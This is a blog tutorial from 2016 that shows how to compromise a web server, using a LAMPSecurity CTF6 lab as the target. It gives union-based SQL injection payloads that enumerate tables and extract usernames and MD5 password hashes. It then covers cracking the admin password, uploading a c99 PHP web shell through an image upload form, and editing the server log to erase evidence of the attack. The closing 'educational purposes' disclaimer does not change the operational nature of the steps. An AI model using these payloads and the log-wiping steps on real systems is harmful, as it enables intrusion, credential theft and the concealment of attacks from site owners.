Thursday, March 17, 2016

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process

Step 1:

I'm on the home page of the website now


[Image: Hackerlaxu1.jpg]

Step 2:

I went through all the pages of web site and found a page with URL input


[Image: Hackerlaxu2.jpg]

Step 3:

I launched Hackbar by pressing F9

[Image: Hackerlaxu3.jpg]

Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.


[Image: Hackerlaxu4.jpg]

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.

Step 5:

Lets find out the number of tables

Code: order by 1

[Image: Hackerlaxu6.jpg]

Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

Code: order by 7

[Image: Hackerlaxu7.jpg]

Step 7:

I went up to 7 and no change till now

Code: order by 7

[Image: Hackerlaxu12.jpg]

Step 8:

I'm on 8 now and I can see the page changed

Code: order by 8

[Image: Hackerlaxu13.jpg]

Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT

[Image: Hackerlaxu14.jpg]

Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables

[Image: Hackerlaxu16.jpg]

Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

Code: UNION SELECT 1,2,3,4,5,6,7

[Image: Hackerlaxu19.jpg]

Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

Code: UNION SELECT 1,user(),3,4,5,6,7

[Image: Hackerlaxu21.jpg]

The current user is cms_user@localhost

Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

Code: UNION SELECT 1,version(),3,4,5,6,7

[Image: Hackerlaxu22.jpg]

5.0.45 is the version

Step 14:

Let me list all the tables

Code: UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: Hackerlaxu23.jpg]

From this list I found "user" is an interesting table

Step 15:

Now I listed all the columns and its a big list

Code: UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: Hackerlaxu24.jpg]

Step 16:

I want columns from the table "user" and nothing else

Code: UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: Hackerlaxu25.jpg]

Step 17:

Lets find the user name

Code: UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: Hackerlaxu27.jpg]

Step 18:

Now, what about password

Code: UNION SELECT 1,user_password,3,4,5,6,7 from user

Its encrypted

Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to >

[Image: Hackerlaxu30.jpg]

Step 20:

Voila.!!! I got the password

[Image: Hackerlaxu31.jpg]

Step 21:

Finding the log in page. Its was right in front of me
[Image: Hackerlaxu32.jpg]

Step 22:

Logging in with the credentials I have
[Image: Hackerlaxu33.jpg]

Step 23:


[Image: Hackerlaxu35.jpg]

Step 24:

I'm an admin now. Look at my powers.

[Image: Hackerlaxu36.jpg]

Step 25:

Let me add an event

[Image: Hackerlaxu.jpg]

Step 26:

and of course I want to upload a picture

[Image: Hackerlaxu38.jpg]

Step 27:

Lets see it allows me to upload the shell or not

[Image: Hackerlaxu39.jpg]

Step 28:

Now I'm pressing on "Add Event" button

[Image: Hackerlaxu40.jpg]

Step 29:

Nice. Looks like it's got uploaded


Step 30:

Let's see where the shell got uploaded to

[Image: Hackerlaxu42.jpg]

Step 31:

I'm trying to get the default upload location

[Image: Hackerlaxu43.jpg]

[Image: Hackerlaxu44.jpg]

Step 32:

Looks like I got it

[Image: Hackerlaxu45.jpg]

Let me click on the c9shell.php file I just uploaded

Step 33:

Voila. I have shell access

[Image: Hackerlaxu46.jpg]

Step 34:

I simply clicked on the up button to get the root folder

[Image: Hackerlaxu48.jpg]

Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial

Step 35:

What I'm interested is the log folder

[Image: Hackerlaxu49.jpg]

Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

[Image: Hackerlaxu51.jpg]

Step 37:

Let me go back and edit the log file

[Image: Hackerlaxu52.jpg]

[Image: Hackerlaxu53.jpg]

Step 38:

I deleted complete log entries. Now saving it.

[Image: Hackerlaxu54.jpg]

Step 39:

Nice. Log file is empty now

[Image: Hackerlaxu56.jpg]

Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove

[Image: Hackerlaxu57.jpg]

Step 41:


[Image: Hackerlaxu58.jpg]

Step 42:

OK. Good Bye C99

[Image: Hackerlaxu59.jpg]

Step 43:

Well. It got deleted itself

[Image: Hackerlaxu60.jpg]


1. Infond tutorial

Happy Hacking.!!! 

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Scanning Server & Web Hacking is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.